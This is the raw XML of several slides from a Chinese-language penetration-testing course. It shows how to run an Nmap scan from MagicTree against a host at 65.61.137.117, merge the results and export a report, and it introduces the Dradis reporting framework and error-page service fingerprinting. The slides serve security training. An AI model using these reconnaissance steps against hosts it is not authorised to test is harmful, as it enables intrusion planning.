        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:srcRect l="1863" t="8914" r="3033" b="4783"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1353537" y="3912728"/>
            <a:ext cx="9861389" cy="5115898"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>
</p:sld>
</file>

<file path=ppt/slides/slide1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74" name="Shape 874"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="764257" y="702168"/>
            <a:ext cx="10148713" cy="1677316"/>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1300480">
              <a:defRPr sz="2800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Magic tree</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>一个更为独特的特征是能够从用户界面上运行</a:t>
            </a:r>
            <a:r>
              <a:t>Nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>。右键单击</a:t>
            </a:r>
            <a:r>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:t>test data”</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>结点，点击</a:t>
            </a:r>
            <a:r>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:t>create child”</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>，然后点击</a:t>
            </a:r>
            <a:r>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:t>simple node”</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>选项。进入</a:t>
            </a:r>
            <a:r>
              <a:t>Host</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>详情，然后按回车。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="875" name="image.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:srcRect l="991" t="6144" r="31015" b="5090"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="997937" y="2762108"/>
            <a:ext cx="5031182" cy="4696289"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="876" name="image.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst/>
          </a:blip>
          <a:srcRect l="1863" t="955" r="64758" b="3936"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6811151" y="2725137"/>
            <a:ext cx="3680203" cy="4770000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>
</p:sld>
</file>

<file path=ppt/slides/slide1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78" name="Shape 878"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="738857" y="829168"/>
            <a:ext cx="10148713" cy="1157683"/>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1300480">
              <a:defRPr sz="2800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>现在点击</a:t>
            </a:r>
            <a:r>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:t>Q1”</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>查询按钮，在</a:t>
            </a:r>
            <a:r>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:t>Command”</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>字段中输入下列</a:t>
            </a:r>
            <a:r>
              <a:t>Nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>的命令，然后点击</a:t>
            </a:r>
            <a:r>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:t>Run”</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>按钮。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="879" name="image.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:srcRect l="1863" t="6239" r="1863" b="7701"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1221175" y="3084124"/>
            <a:ext cx="10118080" cy="4804660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>
</p:sld>
</file>

<file path=ppt/slides/slide1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1" name="Shape 881"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="789657" y="765668"/>
            <a:ext cx="10148713" cy="1157683"/>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1300480">
              <a:defRPr sz="2800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>扫描现在已经开始。我们可以在屏幕的左下方看到一个新创建的任务，而上突出显示部分显示任务的状态。 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="882" name="image.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:srcRect l="1863" t="10832" r="4212" b="50000"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1586873" y="2421748"/>
            <a:ext cx="9036902" cy="1807880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="883" name="image.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst/>
          </a:blip>
          <a:srcRect l="1605" t="7818" r="5642" b="21775"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1994464" y="6506069"/>
            <a:ext cx="9015946" cy="3079966"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="884" name="Shape 884"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1119857" y="5089031"/>
            <a:ext cx="10148713" cy="1157682"/>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1300480">
              <a:defRPr sz="2800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>我们可以进入控制台，并通过单击</a:t>
            </a:r>
            <a:r>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:t>Console”</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>按钮，检查扫描状态。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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5" name="Shape 205"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="641350" y="400049"/>
            <a:ext cx="2933701" cy="76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lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>服务指纹识别</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="206" name="image15.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="967979" y="2885478"/>
            <a:ext cx="10374098" cy="3982589"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="207" name="Shape 207"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="820706" y="1515763"/>
            <a:ext cx="10668465" cy="101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500"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>很多站点，可能没有自定义错误信息。因此在url上随便输入一个不存在的地址，可能会返回有用的信息。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="208" name="Shape 208"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="624045" y="7639049"/>
            <a:ext cx="11995778" cy="101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500"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>通过上图，我们知道该站点的应用程序由PHP编写，Web服务器为Apathe/2.2.22，操作系统为Windows</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>
</p:sld>
</file>

<file path=ppt/slides/slide1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6" name="Shape 886"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1119857" y="778368"/>
            <a:ext cx="10148713" cy="6380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1300480">
              <a:defRPr sz="2800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>一旦扫描完成后，我们可以在</a:t>
            </a:r>
            <a:r>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:t>task”</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>节点看到日志和</a:t>
            </a:r>
            <a:r>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>输出。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="887" name="image.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:srcRect l="1863" t="13359" r="4212" b="23834"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1632651" y="1734255"/>
            <a:ext cx="8912940" cy="2674428"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="888" name="Shape 888"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1119857" y="4726634"/>
            <a:ext cx="10148713" cy="1157683"/>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1300480">
              <a:defRPr sz="2800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>将结果合并到当前的树中，单击</a:t>
            </a:r>
            <a:r>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:t>xmlData”</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>，然后单击</a:t>
            </a:r>
            <a:r>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:t>merge XML data”</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>按钮。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="889" name="image.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst/>
          </a:blip>
          <a:srcRect l="1863" t="5514" r="2339" b="8145"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1950746" y="6202154"/>
            <a:ext cx="8276858" cy="3348366"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>
</p:sld>
</file>

<file path=ppt/slides/slide1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1" name="Shape 891"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="916657" y="892668"/>
            <a:ext cx="10148713" cy="6380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1300480">
              <a:defRPr sz="2800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>扫描的结果被添加到主机</a:t>
            </a:r>
            <a:r>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:t>65.61.137.117”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="892" name="image.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:srcRect l="1863" t="5259" r="3033" b="7400"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1508918" y="2751666"/>
            <a:ext cx="9987133" cy="5054712"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>
</p:sld>
</file>

<file path=ppt/slides/slide1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4" name="Shape 894"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="649957" y="905368"/>
            <a:ext cx="10148713" cy="1677316"/>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1300480">
              <a:defRPr sz="2800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Magic tree</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>有能够生成</a:t>
            </a:r>
            <a:r>
              <a:t>Word</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>格式报告的选项。要生成报告，选择一个节点，定位到</a:t>
            </a:r>
            <a:r>
              <a:t>“report”</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>，然后点击</a:t>
            </a:r>
            <a:r>
              <a:t>“generate report …”</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>选项。</a:t>
            </a:r>
            <a:r>
              <a:t>bing</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>选择报告导出的位置。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="895" name="image.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:srcRect l="1863" t="6692" r="3033" b="5703"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1183071" y="3670864"/>
            <a:ext cx="10148664" cy="3718047"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>
</p:sld>
</file>

<file path=ppt/slides/slide1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7" name="Shape 897"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="840457" y="981568"/>
            <a:ext cx="10148713" cy="6380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defRPr sz="2800">
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>导出的报告如下。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="898" name="image.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:srcRect l="1853" t="2453" r="3044" b="3672"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1639146" y="2193713"/>
            <a:ext cx="9726478" cy="6602568"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>
</p:sld>
</file>

<file path=ppt/slides/slide1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00" name="Shape 900"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1164166" y="2302086"/>
            <a:ext cx="10148712" cy="4243076"/>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1300480">
              <a:defRPr sz="3400">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>渗透测试报告生成器</a:t>
            </a:r>
            <a:r>
              <a:t>———Dradis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="1300480">
              <a:defRPr sz="2800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="1300480">
              <a:defRPr sz="2800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Dradis</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>是一个开放源代码的框架，用于在安全评估过程中实时共享信息。</a:t>
            </a:r>
            <a:r>
              <a:t>dradis</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>自身包含了一个</a:t>
            </a:r>
            <a:r>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>应用程序，它提供了一个集中的资料库来记录什么迄今已完成的工作和仍然需要做的工作。它支持</a:t>
            </a:r>
            <a:r>
              <a:t>SSL</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>通信，可以导入的</a:t>
            </a:r>
            <a:r>
              <a:t>Nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:t>Nessus</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>结果文件，附加文件，生成报表，并且可以扩展，通过扩展就可以与（如漏洞数据库）外部系统结合。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>
</p:sld>
</file>

<file path=ppt/slides/slide1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02" name="Shape 902"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="567266" y="1032086"/>
            <a:ext cx="10148712" cy="1157683"/>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1300480">
              <a:defRPr sz="2800">
